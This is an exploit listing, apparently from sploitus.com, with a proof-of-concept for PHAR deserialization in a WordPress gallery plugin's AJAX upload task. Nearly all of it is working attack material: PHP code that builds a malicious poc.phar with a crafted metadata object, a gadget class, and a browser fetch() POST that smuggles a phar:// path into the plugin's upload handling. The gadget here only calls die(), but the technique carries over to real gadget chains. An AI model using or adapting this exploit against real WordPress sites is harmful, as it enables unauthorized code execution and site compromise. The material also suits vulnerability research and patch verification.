## https://sploitus.com/exploit?id=WPEX-ID:ED099489-1DB4-4B42-9F72-77DE39C9E01E
1. Ensure your WordPress installation is using PHP version 7.4 or earlier.
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:
<?php
class Evil {}
try
{
$pharFile = 'poc.phar';
if (file_exists($pharFile))
{
unlink($pharFile);
}
$phar = new Phar($pharFile);
$phar->startBuffering();
$phar->addFromString( 'test.txt', 'text' );
$phar->setStub( '<?php __HALT_COMPILER(); ?>' );
$phar->setMetadata( new Evil() );
$phar->stopBuffering();
echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
echo $e->getMessage();
}
4. Add the following code to the server to simulate a gadget:
class Evil {
function __wakeup() {
die('Arbitrary deserialization');
}
}
5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.
await (await fetch("/index.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
"method": "POST",
"mode": "cors"
})).text();